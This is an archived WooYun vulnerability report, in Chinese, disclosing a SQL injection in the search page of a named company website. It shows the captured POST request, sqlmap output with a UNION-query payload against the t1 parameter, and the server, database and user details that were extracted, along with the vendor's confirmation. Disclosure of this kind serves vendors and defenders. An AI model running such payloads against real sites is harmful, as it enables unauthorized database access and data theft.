乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
刚刚那个没填写地址url:http://www.sunyard.com/se_result.php搜索除存在单引号报错
抓包:
POST /se_result.php HTTP/1.1Host: www.sunyard.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.sunyard.com/se_result.phpConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 4t1=1
tl参数存在注入:
[13:53:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14back-end DBMS: Microsoft SQL Server 2005[13:53:17] [INFO] fetching database namesavailable databases [1]:[*] master
---Place: POSTParameter: t1 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: t1=1' UNION ALL SELECT NULL, CHAR(58)+CHAR(119)+CHAR(112)+CHAR(107)+CHAR(58)+CHAR(77)+CHAR(106)+CHAR(89)+CHAR(83)+CHAR(85)+CHAR(65)+CHAR(81)+CHAR(81)+CHAR(118)+CHAR(108)+CHAR(58)+CHAR(97)+CHAR(106)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'endw'='endw---[13:57:42] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14back-end DBMS: Microsoft SQL Server 2005[13:57:42] [INFO] fetching current usercurrent user: 'xyd'
危害等级:高
漏洞Rank:20
确认时间:2015-12-14 15:17
非常感谢您的帮助和支持!
暂无